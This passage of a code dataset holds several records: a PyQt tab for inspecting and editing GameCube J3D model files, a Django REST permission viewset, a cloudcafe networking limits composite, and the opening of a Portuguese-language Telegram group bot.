if current_filter is not None:\n filters.append(current_filter)\n filters.append(\"All J3D files (*.bmd *.bdl *.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\")\n \n j3d_name = \"%s.%s\" % (self.j3d_name, self.j3d.file_type[:3])\n self.window().generic_do_gui_file_operation(\n op_callback=self.export_j3d_by_path,\n is_opening=False, is_saving=True, is_folder=False,\n file_type=\"J3D 
file\", file_filter=\";;\".join(filters),\n default_file_name=j3d_name\n )\n \n def load_anim(self):\n filters = []\n filters.append(\"J3D animations (*.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\")\n \n self.window().generic_do_gui_file_operation(\n op_callback=self.load_anim_by_path,\n is_opening=True, is_saving=False, is_folder=False,\n file_type=\"J3D animation\", file_filter=\";;\".join(filters),\n )\n \n \n def import_j3d_by_path(self, j3d_path):\n with open(j3d_path, \"rb\") as f:\n data = BytesIO(f.read())\n \n j3d_name = os.path.splitext(os.path.basename(j3d_path))[0]\n \n self.import_j3d_by_data(data, j3d_name)\n \n def import_j3d_by_data(self, data, j3d_name):\n j3d = self.try_read_j3d(data)\n if j3d is None:\n return\n self.j3d = j3d\n \n self.j3d_name = j3d_name\n \n self.model_loaded = False\n if self.j3d.file_type[:3] in [\"bmd\", \"bdl\"]:\n self.model_loaded = True\n \n self.reload_j3d_chunks_tree()\n \n self.try_show_model_preview(True)\n \n self.ui.export_j3d.setDisabled(False)\n self.ui.load_anim.setDisabled(not self.model_loaded)\n \n def load_anim_by_data(self, data, anim_name):\n j3d = J3D(data)\n if j3d.file_type[:3] != \"brk\":\n return\n brk = j3d\n \n self.ui.j3d_viewer.load_brk(brk)\n \n self.ui.anim_slider.setMinimum(0)\n self.ui.anim_slider.setMaximum(brk.trk1.duration-1)\n self.ui.anim_slider.setValue(0)\n \n def update_anim_frame(self, frame: int):\n self.ui.j3d_viewer.set_anim_frame(frame)\n \n def try_read_j3d(self, data):\n try:\n return J3D(data)\n except Exception as e:\n stack_trace = traceback.format_exc()\n error_message_title = \"Failed to load J3D\"\n error_message = \"Failed to load J3D with error:\\n%s\\n\\n%s\" % (str(e), stack_trace)\n QMessageBox.critical(self, error_message_title, error_message)\n return None\n \n def try_save_j3d(self):\n try:\n self.j3d.save()\n return True\n except Exception as e:\n stack_trace = traceback.format_exc()\n error_message_title = \"Failed to save J3D\"\n error_message = \"Failed to save J3D with error:\\n%s\\n\\n%s\" % (str(e), stack_trace)\n QMessageBox.critical(self, error_message_title, error_message)\n return False\n \n def reload_j3d_chunks_tree(self):\n self.ui.j3d_chunks_tree.clear()\n \n if self.isolated_visibility:\n self.toggle_isolated_visibility(update_preview=False)\n \n self.tree_widget_item_to_object = {}\n \n for chunk in self.j3d.chunks:\n chunk_size_str = self.window().stringify_number(chunk.size, min_hex_chars=5)\n \n chunk_item = QTreeWidgetItem([chunk.magic, \"\", chunk_size_str])\n self.ui.j3d_chunks_tree.addTopLevelItem(chunk_item)\n \n self.tree_widget_item_to_object[chunk_item] = chunk\n \n chunk_item.setExpanded(self.chunk_type_is_expanded.get(chunk.magic, False))\n \n if chunk.magic == \"TEX1\":\n seen_image_data_offsets = []\n seen_palette_data_offsets = []\n \n for i, texture in enumerate(chunk.textures):\n texture_name = chunk.texture_names[i]\n \n # We don't display sizes for texture headers that use image/palette datas duplicated from an earlier tex header.\n # We also don't display the 0x20 byte size of any of the headers.\n texture_total_size = 0\n if texture.image_data_offset+texture.header_offset not in seen_image_data_offsets:\n texture_total_size += fs.pad_offset_to_nearest(fs.data_len(texture.image_data), 0x20)\n seen_image_data_offsets.append(texture.image_data_offset+texture.header_offset)\n if texture.palette_data_offset+texture.header_offset not in seen_palette_data_offsets:\n texture_total_size += 
fs.pad_offset_to_nearest(fs.data_len(texture.palette_data), 0x20)\n seen_palette_data_offsets.append(texture.palette_data_offset+texture.header_offset)\n \n if texture_total_size == 0:\n texture_size_str = \"\"\n else:\n texture_size_str = self.window().stringify_number(texture_total_size, min_hex_chars=5)\n \n self.make_tree_widget_item(texture, chunk_item, [\"\", texture_name, texture_size_str])\n elif chunk.magic == \"MAT3\":\n for mat_index, material in enumerate(chunk.materials):\n mat_name = chunk.mat_names[mat_index]\n mat_item = self.make_tree_widget_item(material, chunk_item, [\"\", mat_name, \"\"])\n indirect = chunk.indirects[mat_index]\n self.make_tree_widget_item(indirect, mat_item, [\"\", f\"Indirect Texturing\", \"\"])\n elif chunk.magic == \"MDL3\":\n for i, mdl_entry in enumerate(chunk.entries):\n mat_name = self.j3d.mat3.mat_names[i]\n self.make_tree_widget_item(mdl_entry, chunk_item, [\"\", mat_name, \"\"])\n elif chunk.magic == \"TRK1\":\n for anim_type_index, anim_type_dict in enumerate([chunk.mat_name_to_reg_anims, chunk.mat_name_to_konst_anims]):\n anim_type = [\"Register\", \"Konstant\"][anim_type_index]\n anim_type_item = self.make_tree_widget_item(None, chunk_item, [\"\", anim_type, \"\"], True)\n for mat_name, anims in anim_type_dict.items():\n mat_item = self.make_tree_widget_item(None, anim_type_item, [\"\", mat_name, \"\"])\n for anim_index, anim in enumerate(anims):\n anim_item = self.make_tree_widget_item(anim, mat_item, [\"\", \"0x%02X\" % anim_index, \"\"])\n for track_name in [\"r\", \"g\", \"b\", \"a\"]:\n track_item = self.make_tree_widget_item(None, anim_item, [\"\", track_name.upper(), \"\"], True)\n track = getattr(anim, track_name)\n for keyframe_index, keyframe in enumerate(track.keyframes):\n self.make_tree_widget_item(keyframe, track_item, [\"\", \"0x%02X\" % keyframe_index, \"\"])\n elif chunk.magic == \"TTK1\":\n chunk_item.setExpanded(True)\n for mat_name, anims in chunk.mat_name_to_anims.items():\n mat_item = self.make_tree_widget_item(None, chunk_item, [\"\", mat_name, \"\"])\n for anim_index, anim in enumerate(anims):\n anim_item = self.make_tree_widget_item(anim, mat_item, [\"\", \"0x%02X\" % anim_index, \"\"])\n for track_name, track in anim.tracks.items():\n track_item = self.make_tree_widget_item(track, anim_item, [\"\", track_name.upper(), \"\"], True)\n for keyframe_index, keyframe in enumerate(track.keyframes):\n self.make_tree_widget_item(keyframe, track_item, [\"\", \"0x%02X\" % keyframe_index, \"\"])\n elif chunk.magic == \"JNT1\":\n for joint_index, joint in enumerate(chunk.joints):\n joint_index_str = self.window().stringify_number(joint_index, min_hex_chars=2)\n joint_name = chunk.joint_names[joint_index]\n self.make_tree_widget_item(joint, chunk_item, [\"\", f\"{joint_index_str}: {joint_name}\", \"\"])\n elif chunk.magic == \"SHP1\":\n for shape_index, shape in enumerate(chunk.shapes):\n shape_index_str = self.window().stringify_number(shape_index, min_hex_chars=2)\n self.make_tree_widget_item(shape, chunk_item, [\"\", shape_index_str, \"\"])\n elif chunk.magic == \"VTX1\":\n for vtx_fmt in chunk.vertex_formats:\n if vtx_fmt.attribute_type == GX.Attr.NULL:\n vtx_fmt_size_str = \"\"\n else:\n vtx_fmt_size = vtx_fmt.component_size * vtx_fmt.component_count * len(chunk.attributes[vtx_fmt.attribute_type])\n vtx_fmt_size_str = self.window().stringify_number(vtx_fmt_size, min_hex_chars=2)\n self.make_tree_widget_item(vtx_fmt, chunk_item, [\"\", vtx_fmt.attribute_type.name, vtx_fmt_size_str])\n elif chunk.magic == \"INF1\":\n for 
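The TEX1 size column above pads each image/palette block to a 0x20-byte boundary before summing. A minimal sketch of that rounding rule, assuming `fs.pad_offset_to_nearest` rounds an offset up to the next multiple of the given alignment (the helper itself is not shown in this file):

```python
def pad_offset_to_nearest(offset: int, alignment: int = 0x20) -> int:
    # Round up to the next multiple of alignment; already-aligned offsets are unchanged.
    return (offset + alignment - 1) // alignment * alignment

assert pad_offset_to_nearest(0x01) == 0x20
assert pad_offset_to_nearest(0x20) == 0x20
assert pad_offset_to_nearest(0x21) == 0x40
```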
node_index, inf1_node in enumerate(chunk.flat_hierarchy):\n node_index_str = self.window().stringify_number(node_index, min_hex_chars=2)\n self.make_tree_widget_item(inf1_node, chunk_item, [\"\", node_index_str, \"\"])\n \n # Expand all items in the tree (for debugging):\n #for item in self.ui.j3d_chunks_tree.findItems(\"*\", Qt.MatchFlag.MatchWildcard | Qt.MatchFlag.MatchRecursive):\n # item.setExpanded(True)\n \n def make_tree_widget_item(self, obj, parent, item_args, expanded=False):\n item = QTreeWidgetItem(item_args)\n parent.addChild(item)\n item.setExpanded(expanded)\n \n if obj is not None:\n self.tree_widget_item_to_object[item] = obj\n \n return item\n \n def item_expanded(self, item):\n obj = self.tree_widget_item_to_object.get(item)\n if isinstance(obj, JChunk):\n self.chunk_type_is_expanded[obj.magic] = True\n \n def item_collapsed(self, item):\n obj = self.tree_widget_item_to_object.get(item)\n if isinstance(obj, JChunk):\n self.chunk_type_is_expanded[obj.magic] = False\n \n def widget_item_selected(self):\n layout = self.ui.scrollAreaWidgetContents.layout()\n self.clear_layout_recursive(layout)\n \n self.ui.j3d_sidebar_label.setText(\"Extra information will be displayed here as necessary.\")\n \n \n selected_items = self.ui.j3d_chunks_tree.selectedItems()\n if not selected_items:\n return\n item = selected_items[0]\n obj = self.tree_widget_item_to_object.get(item)\n \n # import cProfile, pstats\n # profiler = cProfile.Profile()\n # profiler.enable()\n \n if isinstance(obj, MDLEntry):\n self.mdl_entry_selected(obj)\n elif isinstance(obj, AnimationKeyframe):\n self.keyframe_selected(obj)\n elif isinstance(obj, UVAnimation):\n self.uv_anim_selected(obj)\n elif isinstance(obj, ColorAnimation):\n self.color_anim_selected(obj)\n elif isinstance(obj, VertexFormat):\n self.vertex_format_selected(obj)\n elif isinstance(obj, Joint):\n self.bunfoe_instance_selected(obj, \"joint\")\n elif isinstance(obj, Shape):\n self.bunfoe_instance_selected(obj, \"shape\")\n elif isinstance(obj, Material):\n self.bunfoe_instance_selected(obj, \"material\")\n elif isinstance(obj, BUNFOE):\n self.bunfoe_instance_selected(obj)\n \n if self.isolated_visibility:\n self.update_j3d_preview()\n \n # profiler.disable()\n # with open(\"profileresults.txt\", \"w\") as f:\n # ps = pstats.Stats(profiler, stream=f).sort_stats(\"cumulative\")\n # ps.print_stats()\n \n def bunfoe_instance_selected(self, instance, text=None, disabled=False):\n if text:\n self.ui.j3d_sidebar_label.setText(f\"Showing {text}.\")\n \n layout: QBoxLayout = self.ui.scrollAreaWidgetContents.layout()\n \n bunfoe_editor_widget = super().setup_editor_widget_for_bunfoe_instance(instance, disabled=disabled)\n \n layout.addWidget(bunfoe_editor_widget)\n layout.addStretch(1)\n \n return bunfoe_editor_widget\n \n def mdl_entry_selected(self, mdl_entry):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n entry_index = self.j3d.mdl3.entries.index(mdl_entry)\n mat_name = self.j3d.mat3.mat_names[entry_index]\n self.ui.j3d_sidebar_label.setText(\"Showing material display list for: %s\" % mat_name)\n \n bp_commands_widget = QWidget()\n bp_commands_layout = QVBoxLayout(bp_commands_widget)\n xf_commands_widget = QWidget()\n xf_commands_layout = QVBoxLayout(xf_commands_widget)\n \n bp_commands_scroll_area = QScrollArea()\n bp_commands_scroll_area.setWidgetResizable(True)\n bp_commands_scroll_area.setWidget(bp_commands_widget)\n \n xf_commands_scroll_area = QScrollArea()\n xf_commands_scroll_area.setWidgetResizable(True)\n 
xf_commands_scroll_area.setWidget(xf_commands_widget)\n \n tab_widget = QTabWidget()\n tab_widget.addTab(bp_commands_scroll_area, \"BP Commands\")\n tab_widget.addTab(xf_commands_scroll_area, \"XF Commands\")\n layout.addWidget(tab_widget)\n \n for bp_command in mdl_entry.bp_commands:\n if bp_command.register in [entry.value for entry in BPRegister]:\n reg_name = BPRegister(bp_command.register).name\n else:\n reg_name = \"0x%02X\" % bp_command.register\n command_text = \"%s: 0x%06X\" % (reg_name, bp_command.value)\n label = QLabel()\n label.setText(command_text)\n bp_commands_layout.addWidget(label)\n \n for xf_command in mdl_entry.xf_commands:\n if xf_command.register in [entry.value for entry in XFRegister]:\n reg_name = XFRegister(xf_command.register).name\n else:\n reg_name = \"0x%04X\" % xf_command.register\n command_text = \"%s:\\n%s\" % (reg_name, \"\\n\".join([\"0x%08X\" % arg for arg in xf_command.args]))\n label = QLabel()\n label.setText(command_text)\n xf_commands_layout.addWidget(label)\n \n bp_commands_layout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n xf_commands_layout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n \n def keyframe_selected(self, keyframe):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing animation keyframe.\")\n \n label = QLabel()\n label.setText(\"Time: %f\" % keyframe.time)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Value: %f\" % keyframe.value)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tangent in: %f\" % keyframe.tangent_in)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tangent out: %f\" % keyframe.tangent_out)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def uv_anim_selected(self, uv_anim):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing UV animation.\")\n \n label = QLabel()\n label.setText(\"Center: (%f, %f, %f)\" % uv_anim.center_coords)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tex gen index: 0x%02X\" % uv_anim.tex_gen_index)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def color_anim_selected(self, color_anim):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing color animation.\")\n \n label = QLabel()\n label.setText(\"Color ID: 0x%02X\" % color_anim.color_id)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def vertex_format_selected(self, vtx_fmt: VertexFormat):\n # TODO: j3dultra segfaults if you try changing, say, an attribute type from tex0 to tex1 for\n # example (many other cases too). 
need to disable editing these.\n \n widget = self.bunfoe_instance_selected(vtx_fmt, \"vertex format\")\n \n for i in range(widget.layout().rowCount()):\n field_item = widget.layout().itemAt(i, QFormLayout.ItemRole.FieldRole)\n field_widget = field_item.widget()\n if field_widget.property('access_path') == [('attr', 'attribute_type')]:\n combobox: QComboBox = field_widget\n combobox.currentIndexChanged.connect(self.update_vertex_format_component_type_combobox)\n \n self.update_vertex_format_component_type_combobox()\n \n def update_vertex_format_component_type_combobox(self):\n # The component type combobox needs to have the text of its items updated dynamically depending\n # on what the currently selected attribute type is.\n # If a color attribute type is selected, display the duplicate enum names for color types.\n # Otherwise, display the duplicate enum names for number types.\n \n layout = self.ui.scrollAreaWidgetContents.layout()\n if layout.count() <= 0:\n return\n bunfoe_widget = layout.itemAt(0).widget()\n if not isinstance(bunfoe_widget, BunfoeWidget):\n return\n \n vtx_fmt = bunfoe_widget.property('field_owner')\n assert isinstance(vtx_fmt, VertexFormat)\n \n if vtx_fmt.is_color_attr:\n # Colors are at the end of GX.ComponentType's members, so go through the list forwards, so that the\n # later members overwrite the earlier ones in the dict.\n enum_value_order = {v: k for k, v in GX.ComponentType.__members__.items()}\n else:\n # Numbers are at the start of GX.ComponentType's members, so go through the list backwards, so that\n # the earlier members overwrite the later ones in the dict.\n enum_value_order = {v: k for k, v in reversed(GX.ComponentType.__members__.items())}\n \n for i in range(bunfoe_widget.layout().rowCount()):\n field_item = bunfoe_widget.layout().itemAt(i, QFormLayout.ItemRole.FieldRole)\n field_widget = field_item.widget()\n if field_widget.property('access_path') == [('attr', 'component_type')]:\n combobox = field_widget\n for i in range(combobox.count()):\n enum_value = combobox.itemData(i)\n pretty_name = self.prettify_name(enum_value_order[enum_value], title=False)\n combobox.setItemText(i, pretty_name)\n \n \n def export_j3d_by_path(self, j3d_path):\n success = self.try_save_j3d()\n if not success:\n return\n \n with open(j3d_path, \"wb\") as f:\n self.j3d.data.seek(0)\n f.write(self.j3d.data.read())\n \n self.j3d_name = os.path.splitext(os.path.basename(j3d_path))[0]\n \n QMessageBox.information(self, \"J3D file saved\", \"Successfully saved J3D file.\")\n \n def load_anim_by_path(self, anim_path):\n with open(anim_path, \"rb\") as f:\n data = BytesIO(f.read())\n \n anim_name = os.path.splitext(os.path.basename(anim_path))[0]\n \n self.load_anim_by_data(data, anim_name)\n \n def get_file_filter_by_current_j3d_file_type(self):\n if self.j3d.file_type == \"bdl4\":\n return \"Binary Display List Models (*.bdl)\"\n elif self.j3d.file_type == \"bmd3\":\n return \"Binary Models (*.bmd)\"\n elif self.j3d.file_type == \"bmt3\":\n return \"Binary Material Tables (*.bmt)\"\n elif self.j3d.file_type == \"btk1\":\n return \"Texture SRT Animations (*.btk)\"\n elif self.j3d.file_type == \"bck1\":\n return \"Joint Animations (*.bck)\"\n elif self.j3d.file_type == \"brk1\":\n return \"Texture Register Animations (*.brk)\"\n elif self.j3d.file_type == \"btp1\":\n return \"Texture Swap Animations (*.btp)\"\n else:\n return None\n \n def show_j3d_chunks_tree_context_menu(self, pos):\n if self.j3d is None:\n return\n \n item = self.ui.j3d_chunks_tree.itemAt(pos)\n obj = 
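The enum-name trick in `update_vertex_format_component_type_combobox` relies on two Python facts: enum aliases share one member object but keep separate entries in `__members__`, and later keys win in a dict comprehension. A toy `IntEnum` standing in for `GX.ComponentType` (the real member names and values differ):

```python
from enum import IntEnum

class ComponentType(IntEnum):
    U8 = 0      # number formats first...
    S8 = 1
    F32 = 4
    RGBA8 = 4   # ...color formats after; RGBA8 is an alias of F32

# Forward pass: later names win, so shared values show their color name.
color_names = {v: k for k, v in ComponentType.__members__.items()}
assert color_names[ComponentType.F32] == "RGBA8"

# Reversed pass: earlier names win, so shared values show their number name.
number_names = {v: k for k, v in reversed(ComponentType.__members__.items())}
assert number_names[ComponentType.F32] == "F32"
```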
self.tree_widget_item_to_object.get(item)\n \n if isinstance(obj, BTI):\n texture = obj\n \n menu = QMenu(self)\n \n menu.addAction(self.ui.actionOpenJ3DImage)\n self.ui.actionOpenJ3DImage.setData(texture)\n \n menu.addAction(self.ui.actionReplaceJ3DImage)\n self.ui.actionReplaceJ3DImage.setData(texture)\n if self.bti_tab.bti is None:\n self.ui.actionReplaceJ3DImage.setDisabled(True)\n else:\n self.ui.actionReplaceJ3DImage.setDisabled(False)\n \n menu.exec_(self.ui.j3d_chunks_tree.mapToGlobal(pos))\n \n def open_image_in_j3d(self):\n texture = self.ui.actionOpenJ3DImage.data()\n \n # Need to make a fake standalone BTI texture data so we can load it without it being the TEX1 format.\n data = BytesIO()\n bti_header_bytes = fs.read_bytes(texture.data, texture.header_offset, 0x20)\n fs.write_bytes(data, 0x00, bti_header_bytes)\n \n bti_image_data = fs.read_all_bytes(texture.image_data)\n fs.write_bytes(data, 0x20, bti_image_data)\n image_data_offset = 0x20\n fs.write_u32(data, 0x1C, image_data_offset)\n \n if fs.data_len(texture.palette_data) == 0:\n palette_data_offset = 0\n else:\n bti_palette_data = fs.read_all_bytes(texture.palette_data)\n fs.write_bytes(data, 0x20 + fs.data_len(texture.image_data), bti_palette_data)\n palette_data_offset = 0x20 + fs.data_len(texture.image_data)\n fs.write_u32(data, 0x0C, palette_data_offset)\n \n texture_index = self.j3d.tex1.textures.index(texture)\n bti_name = self.j3d.tex1.texture_names[texture_index]\n \n self.bti_tab.import_bti_by_data(data, bti_name)\n \n self.window().set_tab_by_name(\"BTI Images\")\n \n def replace_image_in_j3d(self):\n texture = self.ui.actionReplaceJ3DImage.data()\n \n self.bti_tab.bti.save_changes()\n \n # Need to make a fake BTI header for it to read from.\n data = BytesIO()\n bti_header_bytes = fs.read_bytes(self.bti_tab.bti.data, self.bti_tab.bti.header_offset, 0x20)\n fs.write_bytes(data, 0x00, bti_header_bytes)\n \n texture.read_header(data)\n \n texture.image_data = fs.make_copy_data(self.bti_tab.bti.image_data)\n texture.palette_data = fs.make_copy_data(self.bti_tab.bti.palette_data)\n \n texture.save_header_changes()\n \n # Do a full reload in order to update texture size displayed in the UI.\n self.reload_j3d_chunks_tree()\n \n self.update_j3d_preview()\n \n texture_index = self.j3d.tex1.textures.index(texture)\n texture_name = self.j3d.tex1.texture_names[texture_index]\n self.window().ui.statusbar.showMessage(\"Replaced %s.\" % texture_name, 3000)\n \n def try_show_model_preview(self, reset_camera=False):\n self.ui.j3dultra_error_area.hide()\n self.ui.j3d_viewer.load_model(self.j3d, reset_camera, self.get_hidden_material_indexes())\n \n def update_j3d_preview(self):\n if self.j3d is None:\n return\n \n # TODO: implement copying just the instance, without having to serialize and deserialize it here.\n success = self.try_save_j3d()\n if not success:\n return\n \n self.try_show_model_preview(False)\n \n def display_j3d_preview_error(self, error: str):\n self.ui.j3dultra_error_area.show()\n self.ui.j3dultra_error_label.setText(error)\n self.ui.j3d_viewer.hide()\n \n def toggle_isolated_visibility(self, checked=None, update_preview=True):\n self.isolated_visibility = not self.isolated_visibility\n if self.isolated_visibility:\n self.ui.toggle_visibility.setIcon(self.icon_visible_isolated)\n else:\n self.ui.toggle_visibility.setIcon(self.icon_visible_all)\n if update_preview:\n self.update_j3d_preview()\n \n def 
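`open_image_in_j3d` above turns an embedded TEX1 texture into a standalone BTI by copying the 0x20-byte header, appending the image (and optional palette) data, and patching the offset fields at 0x1C and 0x0C so they are relative to the new file. The same patch-the-offsets idea using only the standard library (big-endian u32 fields assumed, as on GameCube):

```python
import struct

def build_standalone_bti(header: bytes, image_data: bytes, palette_data: bytes = b"") -> bytes:
    assert len(header) == 0x20
    out = bytearray(header) + image_data
    # Image data now starts immediately after the header; patch the offset at 0x1C.
    struct.pack_into(">I", out, 0x1C, 0x20)
    if palette_data:
        # Palette data follows the image data; patch the offset at 0x0C.
        struct.pack_into(">I", out, 0x0C, 0x20 + len(image_data))
        out += palette_data
    return bytes(out)
```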
get_hidden_material_indexes(self):\n indexes = []\n if not self.isolated_visibility:\n return indexes\n \n selected_items = self.ui.j3d_chunks_tree.selectedItems()\n selected_mat_indexes = []\n for item in selected_items:\n if not isinstance(self.tree_widget_item_to_object.get(item), Material):\n continue\n mat_index = self.ui.j3d_chunks_tree.indexFromItem(item).row()\n selected_mat_indexes.append(mat_index)\n if not selected_mat_indexes:\n return indexes\n \n for mat_index in range(len(self.j3d.mat3.materials)):\n if mat_index not in selected_mat_indexes:\n indexes.append(mat_index)\n return indexes\n","sub_path":"gcft_ui/j3d_tab.py","file_name":"j3d_tab.py","file_ext":"py","file_size_in_byte":27401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"32025716","text":"from .viewset_includes import *\n\nclass PermissionViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated,)\n queryset = Permission.objects.all()\n\n def get_object(self, pk=None):\n try:\n return Permission.objects.get(pk = pk)\n except Permission.DoesNotExist:\n raise Http404 \n \n def list(self, request):\n Security.secureAccess(self, 'view_permission', request) \n paginator = ResponsePaginationHelper()\n results = paginator.paginate_queryset(self.queryset, request)\n serializer = PermissionSerializer(results, many=True)\n UserLogHelper.createLog(request, request.method, request.user.id)\n return paginator.get_paginated_response(serializer.data)\n\n def create(self, request):\n Security.secureAccess(self, 'add_permission', request) \n serializer = PermissionSerializer(data = request.data)\n if serializer.is_valid():\n serializer.save() \n UserLogHelper.createLog(request, request.method, request.user.id)\n return Response(serializer.data, status = status.HTTP_201_CREATED) \n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST) \n\n def update(self, request, pk=None):\n Security.secureAccess(self, 'change_permission', request) \n permission = self.get_object(pk) \n serializer = PermissionSerializer(permission, data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data) \n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST) \n\n def retrieve(self, request, pk=None):\n Security.secureAccess(self, 'view_permission', request) \n permission = self.get_object(pk)\n serializer = PermissionSerializer(permission)\n return Response(serializer.data) \n\n def destroy(self, request, pk=None):\n Security.secureAccess(self, 'delete_permission', request) \n permission = self.get_object(pk)\n permission.delete()\n UserLogHelper.createLog(request, request.method, request.user.id)\n return Response(status=status.HTTP_204_NO_CONTENT) ","sub_path":"api/view_sets/permission_view.py","file_name":"permission_view.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"424254263","text":"\"\"\"\nCopyright 2015 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing 
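A viewset like `PermissionViewSet` above is normally wired up through a DRF router; a minimal `urls.py` sketch (the import path follows the record's `sub_path` field, everything else is standard Django REST Framework):

```python
from rest_framework.routers import DefaultRouter

from api.view_sets.permission_view import PermissionViewSet

router = DefaultRouter()
# Explicit basename keeps the route names stable ("permission-list", "permission-detail").
router.register(r"permissions", PermissionViewSet, basename="permission")
urlpatterns = router.urls
```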
permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cloudcafe.networking.networks.composites import _NetworkingAuthComposite\nfrom cloudcafe.networking.networks.extensions.limits_api.behaviors \\\n import LimitsBehaviors\nfrom cloudcafe.networking.networks.extensions.limits_api.client \\\n import LimitsClient\nfrom cloudcafe.networking.networks.extensions.limits_api.config \\\n import LimitsConfig\n\n\nclass LimitsComposite(object):\n networking_auth_composite = _NetworkingAuthComposite\n\n def __init__(self, auth_composite=None):\n auth_composite = auth_composite or self.networking_auth_composite()\n self.url = auth_composite.networking_url\n self.user = auth_composite._auth_user_config\n self.config = LimitsConfig()\n self.client = LimitsClient(**auth_composite.client_args)\n\n self.behaviors = LimitsBehaviors(\n limits_client=self.client, limits_config=self.config)\n","sub_path":"cloudcafe/networking/networks/extensions/limits_api/composites.py","file_name":"composites.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"95656108","text":"import telebot\nfrom telebot.util import extract_arguments\nimport os\nimport logging\nimport pytz\nfrom datetime import datetime, timedelta\n\n\nimport db\nfrom mensagens import *\n\nAPI_TOKEN = os.getenv('API_TOKEN')\nDB_NAME = os.getenv('BOT_DB', \"membros.db\")\n\nassert API_TOKEN is not None\n\nbot = telebot.TeleBot(API_TOKEN, threaded=True)\n\ndb.inicializa(DB_NAME)\n\ndb.lista()\n\nmanaus = pytz.timezone(\"America/Manaus\")\nbelem = pytz.timezone(\"America/Belem\")\nrio_branco = pytz.timezone(\"America/Rio_Branco\")\nbruxelas = pytz.timezone(\"Europe/Brussels\")\npalmas = pytz.timezone(\"America/Araguaina\")\n\n# Hora em que o último aviso foi postado no grupo\n# Usado para evitar que usuários abusem do espaço do grupo para comandos\nultimo_aviso = None\nultimo_novo = None\n\n\ndef em_grupo(mensagem):\n return mensagem.chat.type in [\"group\", \"supergroup\"]\n\ndef destino(mensagem):\n return mensagem.chat.id\n\ndef bot_responda(mensagem, resposta):\n chat_id = destino(mensagem)\n bot.send_message(chat_id, resposta)\n\ndef nome(mensagem):\n nome = mensagem.from_user.first_name\n if not nome:\n return mensagem.from_user.username\n return nome\n\n\ndef protecao_spam_do_grupo(mensagem):\n global ultimo_aviso\n if em_grupo(mensagem):\n if not ultimo_aviso or datetime.now() - ultimo_aviso > timedelta(minutes=15):\n bot_responda(mensagem, BOT_PRIVADO)\n ultimo_aviso = datetime.now()\n return True\n else:\n return False\n\n@bot.message_handler(content_types=['new_chat_participant'])\ndef send_novo(message):\n global ultimo_novo\n nome_u = nome(message)\n if not ultimo_novo or datetime.now() - ultimo_novo > timedelta(minutes=5):\n bot_responda(message, START.format(nome_u))\n else:\n bot_responda(message, START_REPETIDO.format(nome_u))\n ultimo_novo = datetime.now()\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, START.format(nome(message)))\n\n\n\n@bot.message_handler(commands=['help', 'ajuda'])\ndef send_help(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, AJUDA)\n\n\n@bot.message_handler(commands=['link', 'links'])\ndef send_link(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, LINKS)\n\n\n@bot.message_handler(commands=['estados'])\ndef send_estados(message):\n if 
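The `ultimo_aviso`/`ultimo_novo` globals above implement a per-topic cooldown so the bot does not flood the group with repeated notices. The same pattern as a small reusable helper (a sketch, separate from the bot code):

```python
from datetime import datetime, timedelta

class Cooldown:
    """Allows an action at most once per time window."""

    def __init__(self, minutes):
        self.window = timedelta(minutes=minutes)
        self.last = None

    def ready(self):
        now = datetime.now()
        if self.last is None or now - self.last > self.window:
            self.last = now
            return True
        return False

aviso = Cooldown(minutes=15)
assert aviso.ready() is True    # first call goes through
assert aviso.ready() is False   # an immediate repeat is suppressed
```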
